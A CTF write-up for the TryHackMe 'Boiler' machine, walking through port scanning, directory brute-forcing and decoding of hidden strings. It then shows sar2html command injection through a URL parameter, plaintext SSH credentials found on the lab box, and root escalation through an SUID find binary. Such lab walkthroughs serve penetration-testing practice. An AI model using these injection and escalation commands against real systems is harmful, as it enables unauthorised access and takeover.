Boiler CTF — TryHackMe — Writeup
Hello. I’m Rahmos. Here is my Boiler CTF — TryHackMe — Writeup. Check it out!
First, deploy the machine and nmap for opened ports:
nmap -sV -p- -v -T4 <ip>
There are 4 ports opened: 21(FTP), 80(Apache), 10000(Webmin), 55007(SSH).
Unfortunately, webmin is in version 1.9.30, the newest version up to now, so I cannot exploit this.
First, login to FTP using anonymous and move around to get file:
There is a .txt file.
Read content of this file:
get .info.txt -
**Remember to specify the “-” symbol at the end, so that you can read it directly without transfer the file to your machine.
It’s encoded with ROT13. Let’s decode it:
Well, still find nothing valuable 😣 So I guess it’s everything we have at FTP.
As port 80(http) is opened, let’s access its website.
It’ a default Apache website. I’ve checked the page source (Ctrl+U), but nothing valuable. So let’s move to finding hidden dirs using gobuster
gobuster dir -u <ip>:80 -w /path-to-wordlist
robots.txt is existed so just read it:
You’ll see a string of decimal. Decode it from decimal and then Base64, I will use icyberchef.io:
Put the decoded string to hashid:
Decrypt it from md5. I’ll use this link: https://www.dcode.fr/md5-hash
I’ve got a string: kidding. Up to now I haven’t known what is it used for, so just leave it there.
Next, access /joomla
So now I know that the website is using Joomla CMS
Again, scan for hidden dirs, but this time start with /joomla
gobuster dir -u http://<ip>:80/joomla -w /path-to-wordlist
Let’s access /_files
Decode it:
Well, nothing valuable again…
Next, /~www
Nothing.
Next, /_archive:
Still nothing.
Next, /_database
Decode:
“Time command spring”. No meaning!
Next, /_test
There’s something about sar2html. Take a look on Google about this and I’ve found:
Not only the definition, but I’ve also found the remote code exploit: https://www.exploit-db.com/exploits/47204
So, let’s try some basic command first:
http://<ip>/joomla/_test/index.php?plot=;ls%20-al
Oh it works!! There is a log.txt file. Let’s read content of this file by changing the command to cat log.txt
Now I’ve got the credential for SSH:
basterd : superduperp@$$
So what next? Let’s login to SSH using the credential above!
ssh -p 55007 basterd@<ip>
** -p flag will set the SSH port to 55007. Without it, SSH will use the default port: 22
Now I’m into the machine!
Let’s spawn a bash shell for stability using python:
python -c ‘import pty; pty.spawn(“/bin/bash”)’
List file inside:
So, the other users pass is stored in the file backup. Let’s read its content:
**Note: You can read it directly using cat, or transfer it to your machine using scp and then read it.
In case you choose scp, here is the command:
scp backup.sh your-user-name@<your-VPN-ip>:/home/your-user-name
Now I know another credential:
stoner : superduperp@$$no1knows
Let’s SSH as stoner:
ssh -p 55007 stoner@<ip>
Now I’m stoner. Move around and read file:
The content of .secret will be your user.txt flag!
Next, I’ll find a way to own root and get the final flag.
First, I use find to search for file with special SUID bit set:
find / -perm -u=s 2>/dev/null
Well so find itself has the SUID bit set. So that, I’ll also use find to priv escalation!
find . -exec /bin/bash -p \; -quit
find can also execute another command, so in this situation, I use find to execute /bin/bash to spawn a bash shell, the -p flag will make bash execute using find’s SUID. Because find has SUID of root, so bash will spawn a shell as root!
Get the final flag: root.txt
The end.
HAPPY HACKING